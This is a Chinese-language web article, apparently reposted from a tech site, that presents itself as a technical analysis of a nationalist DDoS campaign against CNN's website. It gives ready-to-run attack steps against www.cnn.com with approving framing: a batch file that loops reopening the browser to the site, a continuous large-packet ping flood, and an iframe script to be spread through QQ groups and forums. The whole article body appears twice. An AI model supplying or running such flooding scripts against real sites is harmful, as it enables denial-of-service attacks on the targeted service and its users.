全民紅客 CNN攻擊技術解析
近期,CNN主播卡弗蒂對於中國人民帶有強烈歧視性的言論,以及CNN對於這一事件缺乏誠意的道歉和對於中國政府的無端指責,激起了全國人民的強烈憤慨。於是在一些愛國技術人員的倡議下,廣大網民發起了一場針對CNN官方網站的攻擊行動。下面,筆者從技術的角度對這次攻擊中採用的攻擊方法進行解析。
一、攻擊技術
這次攻擊採用的是DDOS攻擊方法,即英語“Distributed Denial of Service”的縮寫。顧名思義,即是利用網絡中的無數計算機,向某一特定的目標計算機發動密集式的“拒絕服務”要求,從而把目標計算機的網絡資源及系統資源耗盡。這是一種最有效而且難以有效防範的攻擊技術。
1.手動攻擊
在瀏覽器的地址欄中輸入CNN的網站地址http://www.cnn.com,頻繁登錄訪問其網站。其實這算不上攻擊,但是當有數以萬計的人同時登錄時同樣會耗費其網絡帶寬、系統資源,造成網絡擁堵。
2.批處理腳本
把以下代碼保存爲一個.bat文件,比如cnn.bat,然後直接雙擊運行即可。
@echo off
:test
taskkill /f /im iexplore.exe
start http://www.cnn.com
sleep 2
goto test
解釋:每隔1秒鐘關閉IE進程,循環訪問http://www.cnn.com。比上面的手動攻擊更方便,但是IE窗口關閉又開啓影響正常工作,適用於電腦閒置時。(圖1)
3.ping攻擊
在命令行(cmd.exe)中輸入如下命令:
ping www.cnn.com -t -l 65500
解釋:持續不斷向www.cnn.com發送65500字節的數據包,當然只有一臺機器發送沒有效果,當數以萬計的機子發送的時候才見威力。(圖2)
4.腳本攻擊
網友在QQ羣、論壇、百度貼吧等其它地方發佈如下網頁代碼,把它保存爲cnn.htm文件,然後雙擊打開即可。
<iframe id="cnn" width="100%" height="100" ></iframe>
<script>
var e=document.getElementById(’cnn’);
setInterval("e.src=’http://www.cnn.com’",3000);
</script>
解釋:在網頁中嵌入一個框架,每隔3000毫秒打開CNN的網站。不用人工參與,也不影響正常工作。
另外,有些網友做好了攻擊網頁,以鏈接的形式在論壇或者QQ羣等地方發佈出來,大家只需點擊即可。比如:
http://www.test.com/cnn.htm
其cnn.htm頁面的核心代碼也就是上面的網頁腳本代碼。(圖3)
【點擊進入鏈接 http://security.ctocio.com.cn/tips/273/8093773.shtml 】
一、攻擊技術
這次攻擊採用的是DDOS攻擊方法,即英語“Distributed Denial of Service”的縮寫。顧名思義,即是利用網絡中的無數計算機,向某一特定的目標計算機發動密集式的“拒絕服務”要求,從而把目標計算機的網絡資源及系統資源耗盡。這是一種最有效而且難以有效防範的攻擊技術。
1.手動攻擊
在瀏覽器的地址欄中輸入CNN的網站地址http://www.cnn.com,頻繁登錄訪問其網站。其實這算不上攻擊,但是當有數以萬計的人同時登錄時同樣會耗費其網絡帶寬、系統資源,造成網絡擁堵。
2.批處理腳本
把以下代碼保存爲一個.bat文件,比如cnn.bat,然後直接雙擊運行即可。
@echo off
:test
taskkill /f /im iexplore.exe
start http://www.cnn.com
sleep 2
goto test
解釋:每隔1秒鐘關閉IE進程,循環訪問http://www.cnn.com。比上面的手動攻擊更方便,但是IE窗口關閉又開啓影響正常工作,適用於電腦閒置時。(圖1)
3.ping攻擊
在命令行(cmd.exe)中輸入如下命令:
ping www.cnn.com -t -l 65500
解釋:持續不斷向www.cnn.com發送65500字節的數據包,當然只有一臺機器發送沒有效果,當數以萬計的機子發送的時候才見威力。(圖2)
4.腳本攻擊
網友在QQ羣、論壇、百度貼吧等其它地方發佈如下網頁代碼,把它保存爲cnn.htm文件,然後雙擊打開即可。
<iframe id="cnn" width="100%" height="100" ></iframe>
<script>
var e=document.getElementById(’cnn’);
setInterval("e.src=’http://www.cnn.com’",3000);
</script>
解釋:在網頁中嵌入一個框架,每隔3000毫秒打開CNN的網站。不用人工參與,也不影響正常工作。
另外,有些網友做好了攻擊網頁,以鏈接的形式在論壇或者QQ羣等地方發佈出來,大家只需點擊即可。比如:
http://www.test.com/cnn.htm
其cnn.htm頁面的核心代碼也就是上面的網頁腳本代碼。(圖3)
【點擊進入鏈接 http://security.ctocio.com.cn/tips/273/8093773.shtml 】
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.